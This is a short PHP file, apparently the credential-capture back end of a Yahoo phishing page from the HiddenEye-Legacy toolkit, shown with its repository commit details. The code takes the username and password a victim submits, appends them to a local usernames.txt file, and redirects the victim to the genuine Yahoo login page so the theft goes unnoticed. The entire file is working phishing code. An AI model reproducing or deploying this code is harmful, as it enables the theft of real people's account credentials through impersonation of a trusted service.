HiddenEye-Legacy/WebPages/yahoo_web/login.php
Usama Abdul Sattar 896e0bc214
yahoo_added
2018-04-24 19:20:50 +05:00

15 lines
418 B
PHP

<?php
$var = $_POST['username'];
$var2 = $_POST['password'];
$myFile = file_get_contents("protect.html");
$searchString = "<html><title>WELCOME</title></html>";
if($myFile != $searchString) {
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
header('Location:https://login.yahoo.com');
}
if($myFile != $searchString) {
echo "LOGIN SUCCESSFULL";
}
exit();
?>